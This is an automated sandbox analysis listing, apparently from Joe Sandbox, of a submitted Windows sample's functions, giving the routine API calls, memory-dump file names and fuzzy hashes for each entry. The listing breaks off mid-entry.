Download Yara Rule

APIs

GetFileAttributesW.KERNELBASE(?,?,?,0086A189,?,008676B2,?,?,?,?), ref: 0086A1A5
GetFileAttributesW.KERNELBASE(?,?,?,00000800,?,0086A189,?,008676B2,?,?,?,?), ref: 0086A1D1

Memory Dump Source

Source File: 00000000.00000002.2001602241.0000000000861000.00000020.00000001.01000000.00000003.sdmp, Offset: 00860000, based on PE: true

Associated: 00000000.00000002.2001586917.0000000000860000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2001629570.0000000000893000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2001648416.000000000089E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2001648416.00000000008A4000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2001648416.00000000008C1000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2001696295.00000000008C2000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_860000_Mj6WEKda85.jbxd

Similarity

API ID: AttributesFile
String ID:
API String ID: 3188754299-0
Opcode ID: 3c510ce59e1d8300f7632159bb8e79788524606262d5e77d11c96fbf9dc34fdf
Instruction ID: f432fdbb9eb45443b6c05ee7cbf870fc97fa158a117e13dd77780f849e936bd2
Opcode Fuzzy Hash: 3c510ce59e1d8300f7632159bb8e79788524606262d5e77d11c96fbf9dc34fdf
Instruction Fuzzy Hash: 54E092355001285BCB20BB68DC05BD9B75CFB093E1F0542A2FD4AE3290DB709D849AE1

Function 00870085 Relevance: 3.0, APIs: 2, Instructions: 25libraryCOMMON

Download Yara Rule

APIs

GetSystemDirectoryW.KERNEL32(?,00000800), ref: 008700A0
LoadLibraryW.KERNELBASE(?,?,?,?,00000800,?,0086EB86,Crypt32.dll,00000000,0086EC0A,?,?,0086EBEC,?,?,?), ref: 008700C2

Memory Dump Source

Source File: 00000000.00000002.2001602241.0000000000861000.00000020.00000001.01000000.00000003.sdmp, Offset: 00860000, based on PE: true

Associated: 00000000.00000002.2001586917.0000000000860000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2001629570.0000000000893000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2001648416.000000000089E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2001648416.00000000008A4000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2001648416.00000000008C1000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2001696295.00000000008C2000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_860000_Mj6WEKda85.jbxd

Similarity

API ID: DirectoryLibraryLoadSystem
String ID:
API String ID: 1175261203-0
Opcode ID: f373423e928af3b06b6d24a7085f39fa63569ad573c94b0b36bd7ac84b26ad43
Instruction ID: 1b694550581ff64923874b9b6249bcdcd54310f2afc7b076a1e6181bdc3c9e71
Opcode Fuzzy Hash: f373423e928af3b06b6d24a7085f39fa63569ad573c94b0b36bd7ac84b26ad43
Instruction Fuzzy Hash: BCE0127690151C6ADB21AAA49C09FD7776CFF0D392F0440A6BA48D3104DA74DA948BA1

Function 00879B0F Relevance: 3.0, APIs: 2, Instructions: 24windowCOMMON

Download Yara Rule

APIs

GdipCreateBitmapFromStreamICM.GDIPLUS(?,?), ref: 00879B30
GdipCreateBitmapFromStream.GDIPLUS(?,?), ref: 00879B37

Memory Dump Source

Source File: 00000000.00000002.2001602241.0000000000861000.00000020.00000001.01000000.00000003.sdmp, Offset: 00860000, based on PE: true

Associated: 00000000.00000002.2001586917.0000000000860000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2001629570.0000000000893000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2001648416.000000000089E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2001648416.00000000008A4000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2001648416.00000000008C1000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2001696295.00000000008C2000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_860000_Mj6WEKda85.jbxd

Similarity

API ID: BitmapCreateFromGdipStream
String ID:
API String ID: 1918208029-0
Opcode ID: 01bfe0d18c791358828b2d10fec4ff374b2b8a679bb39a5643341147ecbad1e7
Instruction ID: b537a25e0eae1b19e13bfb0fc3fd8f664bb751ca0b1719c8e7929591f88413b7
Opcode Fuzzy Hash: 01bfe0d18c791358828b2d10fec4ff374b2b8a679bb39a5643341147ecbad1e7
Instruction Fuzzy Hash: E1E0ED71911218EFDB10DF98D501A99B7ECFB09321F20C09BF89DD3305D671AE449B91

Function 0088215C Relevance: 3.0, APIs: 2, Instructions: 19COMMON

Download Yara Rule

APIs

Part of subcall function 0088329A: try_get_function.LIBVCRUNTIME ref: 008832AF

___vcrt_FlsSetValue.LIBVCRUNTIME ref: 0088217A
___vcrt_uninitialize_ptd.LIBVCRUNTIME ref: 00882185

Memory Dump Source

Source File: 00000000.00000002.2001602241.0000000000861000.00000020.00000001.01000000.00000003.sdmp, Offset: 00860000, based on PE: true

Associated: 00000000.00000002.2001586917.0000000000860000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2001629570.0000000000893000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2001648416.000000000089E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2001648416.00000000008A4000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2001648416.00000000008C1000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2001696295.00000000008C2000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_860000_Mj6WEKda85.jbxd

Similarity

API ID: Value___vcrt____vcrt_uninitialize_ptdtry_get_function
String ID:
API String ID: 806969131-0
Opcode ID: 5e510fc2aadde680408b7bbe3d6faa1fd342ec76a32deab778be74ac349fa442
Instruction ID: 77c836cca720316495a7547780dad509096a4abdf0fac69d5a9a26a8ca24f5a0
Opcode Fuzzy Hash: 5e510fc2aadde680408b7bbe3d6faa1fd342ec76a32deab778be74ac349fa442
Instruction Fuzzy Hash: BED0A73C144705282C1436B8288A5A83344F962F743F00686F630C51D1EF14A0006312

Function 0087DC67 Relevance: 3.0, APIs: 2, Instructions: 13COMMONLIBRARYCODE

Download Yara Rule

APIs

DloadLock.DELAYIMP ref: 0087DC73
DloadProtectSection.DELAYIMP ref: 0087DC8F

Part of subcall function 0087DE67: DloadObtainSection.DELAYIMP ref: 0087DE77

Memory Dump Source

Source File: 00000000.00000002.2001602241.0000000000861000.00000020.00000001.01000000.00000003.sdmp, Offset: 00860000, based on PE: true

Associated: 00000000.00000002.2001586917.0000000000860000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2001629570.0000000000893000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2001648416.000000000089E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2001648416.00000000008A4000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2001648416.00000000008C1000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2001696295.00000000008C2000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_860000_Mj6WEKda85.jbxd

Similarity

API ID: Dload$Section$LockObtainProtect
String ID:
API String ID: 731663317-0
Opcode ID: 49c04ca7619053535d2cbefdae38f378a4477b4819f853ca7a933db515018f2d
Instruction ID: e935f9832bd5e073642512d81113ee96e3ba5313b5ebb8e513951a82d0095cca
Opcode Fuzzy Hash: 49c04ca7619053535d2cbefdae38f378a4477b4819f853ca7a933db515018f2d
Instruction Fuzzy Hash: 9ED0C970100300CAC312AB189986B1C2274FF54788F648645F16DC62ADDFB9C480CA06

Function 008612E6 Relevance: 3.0, APIs: 2, Instructions: 11COMMON

Download Yara Rule

APIs

GetDlgItem.USER32(?,?), ref: 008612FB
ShowWindow.USER32(00000000), ref: 00861302

Memory Dump Source

Source File: 00000000.00000002.2001602241.0000000000861000.00000020.00000001.01000000.00000003.sdmp, Offset: 00860000, based on PE: true

Associated: 00000000.00000002.2001586917.0000000000860000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2001629570.0000000000893000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2001648416.000000000089E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2001648416.00000000008A4000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2001648416.00000000008C1000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2001696295.00000000008C2000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_860000_Mj6WEKda85.jbxd

Similarity

API ID: ItemShowWindow
String ID:
API String ID: 3351165006-0
Opcode ID: ed022fedcb1e11c874941ac7ed120a72aaf6403bf520ef7e011056b5c1d3cce5
Instruction ID: 5581c19df31fbd6493f9a13adbd08da4c50dcf6932488a340a538cb5331f68a5
Opcode Fuzzy Hash: ed022fedcb1e11c874941ac7ed120a72aaf6403bf520ef7e011056b5c1d3cce5
Instruction Fuzzy Hash: FEC01272058200BECB020BB0DC09D2FBBB8FBA4212F09C90AB2A5C00A0C638C010DB11

Function 008619A6 Relevance: 1.8, APIs: 1, Instructions: 310COMMON

Download Yara Rule

APIs

__EH_prolog.LIBCMT ref: 008619AB

Memory Dump Source

Source File: 00000000.00000002.2001602241.0000000000861000.00000020.00000001.01000000.00000003.sdmp, Offset: 00860000, based on PE: true

Associated: 00000000.00000002.2001586917.0000000000860000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2001629570.0000000000893000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2001648416.000000000089E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2001648416.00000000008A4000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2001648416.00000000008C1000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2001696295.00000000008C2000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_860000_Mj6WEKda85.jbxd

Similarity

API ID: H_prolog
String ID:
API String ID: 3519838083-0
Opcode ID: 47bc70238217ca76a28d47d62b773051d10e55d9bdb9916d7bdbfa6223eb1978
Instruction ID: f6a0ff78180eacc8d76d947b4370adcce9b1f38674b19a22a966bf330594d587
Opcode Fuzzy Hash: 47bc70238217ca76a28d47d62b773051d10e55d9bdb9916d7bdbfa6223eb1978
Instruction Fuzzy Hash: 4BC18D30A042549FEF15DFA8C489BA97BA5FF06315F0E40BAEC45DB287CB319944CB61

Function 00863B3D Relevance: 1.7, APIs: 1, Instructions: 176COMMON

Download Yara Rule

APIs

__EH_prolog.LIBCMT ref: 00863B42

Memory Dump Source

Source File: 00000000.00000002.2001602241.0000000000861000.00000020.00000001.01000000.00000003.sdmp, Offset: 00860000, based on PE: true

Associated: 00000000.00000002.2001586917.0000000000860000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2001629570.0000000000893000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2001648416.000000000089E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2001648416.00000000008A4000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2001648416.00000000008C1000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2001696295.00000000008C2000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_860000_Mj6WEKda85.jbxd

Similarity

API ID: H_prolog
String ID:
API String ID: 3519838083-0
Opcode ID: 863cd1ca0983f5a593041d669b2646c0818c859eb3fbcdd8dae10c5bc0efaa8a
Instruction ID: bd7ee255d1e2bd729f3928f27bc25c14b33bca7459052a340bb49e64ae516f16
Opcode Fuzzy Hash: 863cd1ca0983f5a593041d669b2646c0818c859eb3fbcdd8dae10c5bc0efaa8a
Instruction Fuzzy Hash: AB71AD71104B44AEDB25DB78CC51AE7B7E8FB14301F45496EE5ABC7242DA32AA48CF12

Function 0086837F Relevance: 1.6, APIs: 1, Instructions: 110COMMON

Download Yara Rule

APIs

__EH_prolog.LIBCMT ref: 00868384

Part of subcall function 00861380: __EH_prolog.LIBCMT ref: 00861385
Part of subcall function 00861380: new.LIBCMT ref: 008613FE

Part of subcall function 008619A6: __EH_prolog.LIBCMT ref: 008619AB

Memory Dump Source

Source File: 00000000.00000002.2001602241.0000000000861000.00000020.00000001.01000000.00000003.sdmp, Offset: 00860000, based on PE: true

Associated: 00000000.00000002.2001586917.0000000000860000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2001629570.0000000000893000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2001648416.000000000089E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2001648416.00000000008A4000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2001648416.00000000008C1000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2001696295.00000000008C2000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_860000_Mj6WEKda85.jbxd

Similarity

API ID: H_prolog
String ID:
API String ID: 3519838083-0
Opcode ID: 60ad94bf0dedd5c07dc4fb2143ba719495e6a900a7b199ef2f540cbadec64825
Instruction ID: 8641afb5c166f5c9a75b498aee4c9665573d935ab64b0247ff6f551651a230f2
Opcode Fuzzy Hash: 60ad94bf0dedd5c07dc4fb2143ba719495e6a900a7b199ef2f540cbadec64825
Instruction Fuzzy Hash: 3B41AE318406589ADF20EB64C855BEAB3A8FF50304F0640EAE58EE7093DF755AC8DF52

Function 00861E00 Relevance: 1.6, APIs: 1, Instructions: 76COMMON

Download Yara Rule

APIs

__EH_prolog.LIBCMT ref: 00861E05

Part of subcall function 00863B3D: __EH_prolog.LIBCMT ref: 00863B42

Memory Dump Source

Source File: 00000000.00000002.2001602241.0000000000861000.00000020.00000001.01000000.00000003.sdmp, Offset: 00860000, based on PE: true

Associated: 00000000.00000002.2001586917.0000000000860000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2001629570.0000000000893000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2001648416.000000000089E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2001648416.00000000008A4000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2001648416.00000000008C1000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2001696295.00000000008C2000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_860000_Mj6WEKda85.jbxd

Similarity

API ID: H_prolog
String ID:
API String ID: 3519838083-0
Opcode ID: a45ffd2ce235cefcd12828e30bd6a8a21fa445d6383a8f142cad5b87468847f8
Instruction ID: 4038238b760588498730333079c32fe0f722a7d1733d5ee547f1a5b0e90c449e
Opcode Fuzzy Hash: a45ffd2ce235cefcd12828e30bd6a8a21fa445d6383a8f142cad5b87468847f8
Instruction Fuzzy Hash: 572128319041089ECF11EF99D9499EEBBF6FF58300B15446EE849A7652CB325E10CB61

Function 0087A7C3 Relevance: 1.6, APIs: 1, Instructions: 71COMMON

Download Yara Rule

APIs

__EH_prolog.LIBCMT ref: 0087A7C8

Part of subcall function 00861380: __EH_prolog.LIBCMT ref: 00861385
Part of subcall function 00861380: new.LIBCMT ref: 008613FE

Memory Dump Source

Source File: 00000000.00000002.2001602241.0000000000861000.00000020.00000001.01000000.00000003.sdmp, Offset: 00860000, based on PE: true

Associated: 00000000.00000002.2001586917.0000000000860000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2001629570.0000000000893000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2001648416.000000000089E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2001648416.00000000008A4000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2001648416.00000000008C1000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2001696295.00000000008C2000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_860000_Mj6WEKda85.jbxd

Similarity

API ID: H_prolog
String ID:
API String ID: 3519838083-0
Opcode ID: 10f7fdbf9473808b8a31729287ac4ea0938b1c9208968089cb75d8f24fc4a2b3
Instruction ID: 32d12f02c206b7bf0cc9fa26c77953faca63abfe8edb63c1c8a33c9b5e09f2f0
Opcode Fuzzy Hash: 10f7fdbf9473808b8a31729287ac4ea0938b1c9208968089cb75d8f24fc4a2b3
Instruction Fuzzy Hash: 47216D71C042499ACF15DF98C9429EEB7B4FF59304F0444AEE809E7202DB35AE06CB62

Function 008692E6 Relevance: 1.6, APIs: 1, Instructions: 55COMMON

Download Yara Rule

APIs

__EH_prolog.LIBCMT ref: 008692EB

Memory Dump Source

Source File: 00000000.00000002.2001602241.0000000000861000.00000020.00000001.01000000.00000003.sdmp, Offset: 00860000, based on PE: true

Associated: 00000000.00000002.2001586917.0000000000860000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2001629570.0000000000893000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2001648416.000000000089E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2001648416.00000000008A4000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2001648416.00000000008C1000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2001696295.00000000008C2000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_860000_Mj6WEKda85.jbxd

Similarity

API ID: H_prolog
String ID:
API String ID: 3519838083-0
Opcode ID: 072e60aecf9a720015ad472219b1507c1a3a3b532ad196bbd1cdbfc42a165342
Instruction ID: 8b9175cfdfdeff0acc3dd55165d7a31dcc15e3182c30ddd6bca7fe541bb2e31f
Opcode Fuzzy Hash: 072e60aecf9a720015ad472219b1507c1a3a3b532ad196bbd1cdbfc42a165342
Instruction Fuzzy Hash: EB115E73A105289BCF22AEACCD529EEB73AFF48750F064115F849E7391DA358D1186E1

Function 0086AA88 Relevance: 1.5, APIs: 1, Instructions: 40COMMON

Download Yara Rule

APIs

new.LIBCMT ref: 0086AA9A

Memory Dump Source

Source File: 00000000.00000002.2001602241.0000000000861000.00000020.00000001.01000000.00000003.sdmp, Offset: 00860000, based on PE: true

Associated: 00000000.00000002.2001586917.0000000000860000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2001629570.0000000000893000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2001648416.000000000089E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2001648416.00000000008A4000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2001648416.00000000008C1000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2001696295.00000000008C2000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_860000_Mj6WEKda85.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: dae87922ec1b8facf4cbd1f95d3770f60e2097a5265b52e6532e4d2d30c47c6e
Instruction ID: 02bb7a9f1bd7480cb5f2f7af90fc1cff7c25c6900d9e9d6a93f4efdd97dcf7d2
Opcode Fuzzy Hash: dae87922ec1b8facf4cbd1f95d3770f60e2097a5265b52e6532e4d2d30c47c6e
Instruction Fuzzy Hash: 15F081305107159FDB38DEA8C941716B7E5FB15321F21891BE496D3680E770D880CB52

Function 00865BD7 Relevance: 1.5, APIs: 1, Instructions: 32COMMON

Download Yara Rule

APIs

__EH_prolog.LIBCMT ref: 00865BDC

Part of subcall function 0086B07D: __EH_prolog.LIBCMT ref: 0086B082

Memory Dump Source

Source File: 00000000.00000002.2001602241.0000000000861000.00000020.00000001.01000000.00000003.sdmp, Offset: 00860000, based on PE: true

Associated: 00000000.00000002.2001586917.0000000000860000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2001629570.0000000000893000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2001648416.000000000089E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2001648416.00000000008A4000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2001648416.00000000008C1000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2001696295.00000000008C2000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_860000_Mj6WEKda85.jbxd

Similarity

API ID: H_prolog
String ID:
API String ID: 3519838083-0
Opcode ID: 7b1522d411c4538bcf0a49fa7cf940a4144554bddd6073b274853b9bb61d871d
Instruction ID: c1b4f9a0595f478806ab05badf0e5f0fce4a95d6d5625cb9be78b352e20fdc82
Opcode Fuzzy Hash: 7b1522d411c4538bcf0a49fa7cf940a4144554bddd6073b274853b9bb61d871d
Instruction Fuzzy Hash: D801AD30A04684DAC724F7A8D0553DDFBA4EF19300F81809DF96A97283CBB01B08C663

Function 00888518 Relevance: 1.5, APIs: 1, Instructions: 32memoryCOMMONLIBRARYCODE

Download Yara Rule

APIs

RtlAllocateHeap.NTDLL(00000000,?,00000000,?,0088C13D,00000000,?,008867E2,?,00000008,?,008889AD,?,?,?), ref: 0088854A

Memory Dump Source

Source File: 00000000.00000002.2001602241.0000000000861000.00000020.00000001.01000000.00000003.sdmp, Offset: 00860000, based on PE: true

Associated: 00000000.00000002.2001586917.0000000000860000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2001629570.0000000000893000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2001648416.000000000089E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2001648416.00000000008A4000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2001648416.00000000008C1000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2001696295.00000000008C2000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_860000_Mj6WEKda85.jbxd

Similarity

API ID: AllocateHeap
String ID:
API String ID: 1279760036-0
Opcode ID: c764558ea6b2f546f51e557a4efe1eeac5cf006c1671c7ecc43d6fa6e24fedd7
Instruction ID: d26895616d1f719a1cb28cb1877073993428dbc4ebc76544b2d10accca4a09ad
Opcode Fuzzy Hash: c764558ea6b2f546f51e557a4efe1eeac5cf006c1671c7ecc43d6fa6e24fedd7
Instruction Fuzzy Hash: 39E0E561580525DAEB31376D5C04B5A7B8CFF413B0F940210EC14E2081CF20DC0047E6

Function 0086A4C6 Relevance: 1.5, APIs: 1, Instructions: 27COMMON

Download Yara Rule

APIs

FindClose.KERNELBASE(00000000,000000FF,?,?), ref: 0086A4F5

Memory Dump Source

Source File: 00000000.00000002.2001602241.0000000000861000.00000020.00000001.01000000.00000003.sdmp, Offset: 00860000, based on PE: true

Associated: 00000000.00000002.2001586917.0000000000860000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2001629570.0000000000893000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2001648416.000000000089E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2001648416.00000000008A4000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2001648416.00000000008C1000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2001696295.00000000008C2000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_860000_Mj6WEKda85.jbxd

Similarity

API ID: CloseFind
String ID:
API String ID: 1863332320-0
Opcode ID: 1ead206be0c1f469829729a351bcbd351bf756b60df03e5b606a7887e431c8c2
Instruction ID: b403838d33e4f162a3df4684c22eed035ce532733625ee15954f24740712b45c
Opcode Fuzzy Hash: 1ead206be0c1f469829729a351bcbd351bf756b60df03e5b606a7887e431c8c2
Instruction Fuzzy Hash: 62F0E931009780AACA226BBC48057D6BF90FF06331F05CA49F1FEA2195C67414D59F23

Function 0087067C Relevance: 1.5, APIs: 1, Instructions: 21threadCOMMON

Download Yara Rule

APIs

SetThreadExecutionState.KERNEL32(00000001), ref: 008706B1

Memory Dump Source

Source File: 00000000.00000002.2001602241.0000000000861000.00000020.00000001.01000000.00000003.sdmp, Offset: 00860000, based on PE: true

Associated: 00000000.00000002.2001586917.0000000000860000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2001629570.0000000000893000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2001648416.000000000089E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2001648416.00000000008A4000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2001648416.00000000008C1000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2001696295.00000000008C2000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_860000_Mj6WEKda85.jbxd

Similarity

API ID: ExecutionStateThread
String ID:
API String ID: 2211380416-0
Opcode ID: 21abda6972f3cca0cdd0e18d326119f9fecfaa4f290630512dfb5f4db0b22a59
Instruction ID: 396adbbf69b334730bf1a6be61d5c37ee524d47ed498bf9777d96922f8441ab9
Opcode Fuzzy Hash: 21abda6972f3cca0cdd0e18d326119f9fecfaa4f290630512dfb5f4db0b22a59
Instruction Fuzzy Hash: 5CD0C22430415069DA2133ACA80A7FE1A06FFC3710F09402AB44DEBACA9E4A48865AA3

Function 00879D7B Relevance: 1.5, APIs: 1, Instructions: 17memoryCOMMON

Download Yara Rule

APIs

GdipAlloc.GDIPLUS(00000010), ref: 00879D81

Part of subcall function 00879B0F: GdipCreateBitmapFromStreamICM.GDIPLUS(?,?), ref: 00879B30

Memory Dump Source

Source File: 00000000.00000002.2001602241.0000000000861000.00000020.00000001.01000000.00000003.sdmp, Offset: 00860000, based on PE: true

Associated: 00000000.00000002.2001586917.0000000000860000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2001629570.0000000000893000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2001648416.000000000089E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2001648416.00000000008A4000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2001648416.00000000008C1000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2001696295.00000000008C2000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_860000_Mj6WEKda85.jbxd

Similarity

API ID: Gdip$AllocBitmapCreateFromStream
String ID:
API String ID: 1915507550-0
Opcode ID: 4cf3c4e169e0f80c123d24ade4c43f63bdfd109b4bf71df52acedaf40aa9962d
Instruction ID: d2129b365c89f4b7e640b6f1d06cb64a2d7da1c77dbad2fa80de4ba901ec74a7
Opcode Fuzzy Hash: 4cf3c4e169e0f80c123d24ade4c43f63bdfd109b4bf71df52acedaf40aa9962d
Instruction Fuzzy Hash: 19D0A73021820C7ADF50BA788C0397A7FA8FB14320F00C065FC4CC6145FE71DE10A662

Function 00869989 Relevance: 1.5, APIs: 1, Instructions: 15COMMON

Download Yara Rule

APIs

GetFileType.KERNELBASE(000000FF,00869887), ref: 00869995

Memory Dump Source

Source File: 00000000.00000002.2001602241.0000000000861000.00000020.00000001.01000000.00000003.sdmp, Offset: 00860000, based on PE: true

Associated: 00000000.00000002.2001586917.0000000000860000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2001629570.0000000000893000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2001648416.000000000089E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2001648416.00000000008A4000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2001648416.00000000008C1000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2001696295.00000000008C2000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_860000_Mj6WEKda85.jbxd

Similarity

API ID: FileType
String ID:
API String ID: 3081899298-0
Opcode ID: 5ed9e73019e4371322a5c7cc6b01e382235956d3653e3d322747facf477ed07f
